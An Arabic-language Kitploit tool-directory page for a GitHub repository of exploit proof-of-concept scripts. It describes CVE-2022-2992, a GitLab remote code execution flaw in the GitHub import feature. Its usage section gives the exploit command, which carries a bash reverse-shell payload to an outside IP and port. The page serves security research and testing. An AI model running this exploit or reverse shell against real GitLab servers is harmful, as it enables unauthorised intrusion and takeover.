Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVEs — مجموعة من سكربتات إثبات المفهوم (PoC) لاستغلال الثغرات، كتبها فريق Redway Security لمجموعة متنوعة من ثغرات CVE. | Kitploit
أدوات/GitHubGitHub/redwaysecurity/cves
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubredwaysecurity/cves

CVEs

مجموعة من سكربتات إثبات المفهوم (PoC) لاستغلال الثغرات، كتبها فريق Redway Security لمجموعة متنوعة من ثغرات CVE.

عرض المستودع
22منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-2992: تنفيذ الأوامر عن بُعد عبر استيراد Github

معلومات

الوصف: يسمح هذا للمستخدم المُصادَق عليه بتحقيق تنفيذ التعليمات البرمجية عن بُعد عبر نقطة نهاية Import from GitHub API.
الإصدارات المتأثرة: جميع الإصدارات من 11.10 إلى ما قبل 15.1.6، و15.2 إلى 15.2.4، و15.3 إلى 15.3.2
الإصدار المُصحَّح: 15.3.2
الباحث: vakzz
رابط الشرح: https://blog.redwaysecurity.com/2023/04/desenvolvendo-o-exploit-para-o-cve-2022.html
رابط NIST CVE: https://nvd.nist.gov/vuln/detail/CVE-2022-2992

استغلال إثبات المفهوم (Proof-of-Concept)

الوصف

يمكن للمستخدم المُصادَق عليه استيراد مستودع من Github إلى Gitlab. ويمكن للمهاجم محاولة الاستيراد من خادم تحكم خاص به، يردّ بكائن من بروتوكول تسلسل Redis داخل الحقل المتداخل default_branch، مما يجعل Gitlab يخزّن هذا الكائن مؤقتًا في Redis، ثم يقوم Redis بإلغاء تسلسله وتنفيذ الحمولة.

الاستخدام/الاستغلال

ستحتاج إلى رمز وصول شخصي

root@kitploit:~
$ bundle install # install dependencies
$ ngrok http 127.0.0.1:4567  # start ngrok tunnel
$ export NGROK_URL=https://68b9-83-173-213-121.eu.ngrok.io # use the url from ngrok
$ ruby exploit.rb http://target.gitlab.com w4dg6wVj7j7xlJgpGLEYdwFe 'bash -c "sh -i >& /dev/tcp/172.23.0.1/1337 0>&1"' # that is a example, use your own payload

مثال

تنفيذ الأوامر عن بُعد عبر استيراد Github

تنزيل الأداة